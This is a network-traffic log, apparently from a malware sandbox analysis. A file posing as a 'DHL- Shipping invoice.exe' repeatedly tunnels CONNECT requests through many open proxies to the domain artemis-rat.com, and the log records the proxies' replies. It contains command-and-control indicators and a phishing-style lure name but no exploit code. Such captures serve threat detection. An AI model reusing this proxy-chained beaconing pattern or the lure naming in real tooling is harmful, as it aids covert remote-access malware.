66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1578192.168.2.454661149.62.244.2741536484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.969177008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1579192.168.2.45468351.255.208.3319916484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.978970051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.471772909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.009284973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.103995085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.250380039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.453288078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:14.508493900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:18.612926960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:26.749963999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1580192.168.2.449950107.180.90.42106706484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.987842083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.046926975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.140815973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:18.246264935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:30.249774933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:42.343532085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:54.343514919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:18.343666077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:39:06.421842098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1581192.168.2.45463447.56.110.20489896484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.998279095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1582192.168.2.454310184.178.172.28152946484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.004106045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1583192.168.2.454636211.222.252.187806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.010253906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1584192.168.2.454120167.99.39.82134866484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.013293982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1585192.168.2.4546393.108.115.4810806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.015857935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.295314074 CET116INHTTP/1.1 200 OK
                            Date: Tue, 12 Mar 2024 07:37:06 GMT
                            Server: nginx
                            Content-Type: text/plain
                            Content-Length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1586192.168.2.452889105.235.197.162540666484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.017162085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1587192.168.2.45303279.143.177.29219726484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.020416021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.933954954 CET131INHTTP/1.1 503 Too many open connections
                            Content-Type: text/plain
                            Connection: close
                            Data Raw: 4d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 6f 70 65 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 20 72 65 61 63 68 65 64 2e 0a
                            Data Ascii: Maximum number of open connections reached.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1588192.168.2.45470045.87.43.152806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.030524015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1589192.168.2.454658211.222.252.18781976484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.036711931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1590192.168.2.45292814.37.251.11631286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.043919086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.046926975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.140815973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:18.246335030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:30.252842903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1591192.168.2.454692190.210.186.241806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.048301935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.284415007 CET444INHTTP/1.1 405 Method Not Allowed
                            Date: Tue, 12 Mar 2024 07:37:06 GMT
                            Server: Apache
                            Allow: GET,HEAD,POST,OPTIONS,TRACE
                            Content-Length: 235
                            Connection: close
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 43 4f 4e 4e 45 43 54 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 65 20 55 52 4c 20 2f 69 6e 64 65 78 2e 68 74 6d 6c 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method CONNECT is not allowed for the URL /index.html.</p></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1592192.168.2.45470423.137.248.19788886484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.052890062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1593192.168.2.450078162.241.46.6500626484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.126524925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.239928961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.250346899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:18.362248898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:30.452948093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:42.452959061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1594192.168.2.454776104.25.244.70806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.133677959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.221821070 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:06 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1595192.168.2.45471481.250.223.126806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.135158062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.312376022 CET805INHTTP/1.1 500 Internal Server Error
                            Date: Tue, 12 Mar 2024 07:37:06 GMT
                            Server: Apache/2.4.41 (Ubuntu)
                            Content-Length: 613
                            Connection: close
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1596192.168.2.454785104.16.105.198806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.138817072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.226166964 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:06 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1597192.168.2.45467413.208.168.17931286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.138911009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.429187059 CET116INHTTP/1.1 200 OK
                            Date: Tue, 12 Mar 2024 07:37:06 GMT
                            Server: nginx
                            Content-Type: text/plain
                            Content-Length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1598192.168.2.45472379.137.194.20330026484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.138911009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1599192.168.2.45470137.27.32.80806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.140932083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.765615940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1600192.168.2.45472480.67.8.6806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.140960932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
